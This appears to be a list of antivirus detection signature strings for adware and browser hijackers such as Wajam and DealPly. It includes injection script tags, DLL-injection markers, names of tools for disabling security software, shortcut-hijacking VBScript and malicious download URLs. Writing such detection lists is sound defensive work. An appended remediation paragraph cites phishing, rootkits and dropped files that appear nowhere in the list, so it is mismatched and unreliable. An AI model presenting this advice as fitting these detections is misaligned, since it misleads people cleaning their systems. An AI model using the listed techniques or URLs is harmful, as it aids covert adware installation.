- content/jquery4toolbar.js (PEHSTR_EXT)
- kle.austries.com/amm/rapps/%s_%s/%s/loader.js?d=t (PEHSTR_EXT)
- TrayIcons/logo.ico (PEHSTR_EXT)
- c:\webwork\adblocker\agent\driver\32bit\hookssrv.c (PEHSTR_EXT)
- <script type="text/javascript" src="%s" id="__amm_01" charset="UTF-8"></script> (PEHSTR_EXT)
- replace.suni="%d"; replace.dsr="%s"; replace.pgd="%s"; replace.tt = "%s"; (PEHSTR_EXT)
- ws.xcodelib.net (PEHSTR_EXT)
- zo..omi..fy (PEHSTR_EXT)
- zo..om..ify (PEHSTR_EXT)
- url": "http://kle.austries (PEHSTR_EXT)
- tb@zoomify.com (PEHSTR_EXT)
- \DhmReu (FOLDERNAME)
- \micron (FOLDERNAME)
- \webzoom (FOLDERNAME)
- GoogleUpdateHelper.dll (PEHSTR_EXT)
- /pid= (PEHSTR_EXT)
- html_loader.exe (PEHSTR_EXT)
- %you%\Explorer\%to%\%idea% (PEHSTR_EXT)
- <SCRIPT>eval(BgScript);</SCRIPT> (PEHSTR_EXT)
- loader.gif (PEHSTR_EXT)
- progressbar.gif (PEHSTR_EXT)
- ForceRemove {F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5} = s 'TinyJSObject Class' (PEHSTR_EXT)
- SOFTWARE\Microsoft\Internet Explorer\ApprovedExtensionsMigration\% (PEHSTR_EXT)
- \production (PEHSTR_EXT)
- recompile (PEHSTR_EXT)
- \multinstaller\ (PEHSTR_EXT)
- \recompile\ (PEHSTR_EXT)
- \bin\Release.Minimal\downloader.pdb (PEHSTR_EXT)
- \bin\Release.Minimal\runner.pdb (PEHSTR_EXT)
- \bin\Release.Minimal\officer.pdb (PEHSTR_EXT)
- Checking HKLM\SOFTWARE\ (PEHSTR_EXT)
- Microsoft\Windows\CurrentVersion\Uninstall\{ (PEHSTR_EXT)
- installcollection.com/?HID=%HID%&BITS=%BITS%&PID= (PEHSTR_EXT)
- Safari/537.17 (PEHSTR_EXT)
- ChickenApp.openURL = function(url) (PEHSTR_EXT)
- SuzanDLL\Release\suzanw.pdb (PEHSTR_EXT)
- \CScript.exe" //b //e:vbscript //nologo (PEHSTR_EXT)
- http://ins.pricejs.net/dealdo/install-report?type=install (PEHSTR_EXT)
- dll-file-name (PEHSTR_EXT)
- \Rkey.dat (PEHSTR_EXT)
- \Start Menu\Programs\Booking .lnk (PEHSTR_EXT)
- <script src='http://j.pricejs.net/ (PEHSTR_EXT)
- /common.js?channel= (PEHSTR_EXT)
- WatchDog\Release\pricemeterw.pdb (PEHSTR_EXT)
- DealPly\DealPlySetup (PEHSTR_EXT)
- \Uninstall\PriceFountain (PEHSTR_EXT)
- /install /UnNm="Update (PEHSTR_EXT)
- release.dll (PEHSTR_EXT)
- SuzanEXE.pdb (PEHSTR_EXT)
- \amazon.URL (FILEPATH)
- \amazon .lnk (FILEPATH)
- \Booking.URL (FILEPATH)
- \Tasks\PFExe (FILEPATH)
- \Booking .lnk (FILEPATH)
- coredll.dll (PEHSTR_EXT)
- \amulecustom\bikaQ\Release\update.pdb (PEHSTR_EXT)
- \amulecustom\amule\update\Release\update.pdb (PEHSTR_EXT)
- \src\out\Release\setup.pdb (PEHSTR_EXT)
- setup.dll (PEHSTR_EXT)
- DllEntry (PEHSTR_EXT)
- MMM.dll (PEHSTR_EXT)
- MIO.dll (PEHSTR_EXT)
- StopSafeTools\code\mse_avg_avira_mca (PEHSTR_EXT)
- TTT.dll (PEHSTR_EXT)
- CC.dll (PEHSTR_EXT)
- WhiteListAndClearLog\code\Release\SSS.pdb (PEHSTR_EXT)
- SSS.dll (PEHSTR_EXT)
- \out\Release\mem_load_dll.pdb (PEHSTR_EXT)
- mem_load_dll.dll (PEHSTR_EXT)
- \out\Release\omaha.pdb (PEHSTR_EXT)
- \winmm_x86.pdb (PEHSTR_EXT)
- software\LiveUpdate (PEHSTR_EXT)
- \wtsapi32_x86.pdb (PEHSTR_EXT)
- WWE_uninstall.exe (PEHSTR_EXT)
- http://install-apps.com/s2s_install.exe (PEHSTR_EXT)
- WBE_uninstall.exe (PEHSTR_EXT)
- wajam_goblin.pdb (PEHSTR_EXT)
- wajam_goblin_64.pdb (PEHSTR_EXT)
- D:\jenkins\workspace\stable- (PEHSTR_EXT)
- \src\http_interception\ (PEHSTR_EXT)
- 0-9_.pdb (PEHSTR_EXT)
- <script data-type="injected" src="%1%%2%%3%%4%"></script> (PEHSTR_EXT)
- AVquic_request_parser@http_parsing@@ (PEHSTR_EXT)
- folder of wajam dll (PEHSTR_EXT)
- path to patch.zip (PEHSTR_EXT)
- inject dll into target process (PEHSTR_EXT)
- \src\Release\wajam.pdb (PEHSTR_EXT)
- D:\jenkins\workspace\moti- (PEHSTR_EXT)
- \src\ServiceRunner\ (PEHSTR_EXT)
- .?AVAsmHelperBase@blackbone@@ (PEHSTR_EXT)
- .?AV?$_Ref_count_del@PAUHINSTANCE__@@V (PEHSTR_EXT)
- \src\x64\Release\wajam_64.pdb (PEHSTR_EXT)
- If LCase(fso.GetExtensionName(file.Path)) = \"lnk\" (PEHSTR_EXT)
- Const linkChrome = \"http://9o0gle.com/\" (PEHSTR_EXT)
- Const link = \"http://navsmart.info\" (PEHSTR_EXT)
- Const link = \"http://www.navsmart.info/\" (PEHSTR_EXT)
- Const link = \"http://yeabests.cc\" (PEHSTR_EXT)
- Const link = \"http://jyhjyy.top\" (PEHSTR_EXT)
- Const link = \"http://navigation.iwatchavi.com/\" (PEHSTR_EXT)
- xmlHttp.open \"GET\", \"http://bbtbfr.pw/GetHPHost (PEHSTR_EXT)
- tmp.mof (PEHSTR_EXT)
- \kemgadeojglibflomicgnfeopkdfflnk (FOLDERNAME)
- pv/%0 (SNID)
- ~/\Qd: (SNID)
- DTOOLS8_x86.XLL (MACROHSTR_EXT)
- SOP Return.xlsm (MACROHSTR_EXT)
- SOP Data BACKUP.xlsm (MACROHSTR_EXT)
- application.run("piputval" (MACROHSTR_EXT)
- C:\Program Files (x86)\DPW-Apps\ (MACROHSTR_EXT)
- www.mdf-xlpages.com (MACROHSTR_EXT)
- www.excelabo.net (MACROHSTR_EXT)
- http://excel-malin.com (MACROHSTR_EXT)
- ActiveWorkbook.Worksheets("Notes").Activate (MACROHSTR_EXT)
- BOM Upload.xlsx (MACROHSTR_EXT)
- description="ribbon and handler for asap utilities" (MACROHSTR_EXT)
- " & Year(Now) & ", MUFG Bank. All Rights Reserved. (MACROHSTR_EXT)
- Sheets("PBR_Template").Select (MACROHSTR_EXT)
- Set BEx1 = Application.Run("BExAnalyzer.xla!GetBEx") (MACROHSTR_EXT)
- If InStr(lName.Name, "BEx") (MACROHSTR_EXT)
- software\haver\dlxmenu (MACROHSTR_EXT)
- software\haver\dlxranger (MACROHSTR_EXT)
- software\haver\exceldatefirst (MACROHSTR_EXT)
- HSBCnetCheck.Value (MACROHSTR_EXT)
- ActiveSheet.Protect ("abernoway") (MACROHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForSoftwarePacking.C!pli (PEHSTR_EXT)Immediately isolate the affected system from the network. Conduct a comprehensive full system scan with updated antivirus software, paying close attention to dropped files (e.g., jjueA.exe, Xue.exe) and potential rootkit components. Change all credentials potentially compromised by the phishing attempt, and review system logs for persistence mechanisms. Due to the high likelihood of rootkit presence and system compromise, a full system re-image is strongly recommended if complete eradication cannot be confirmed.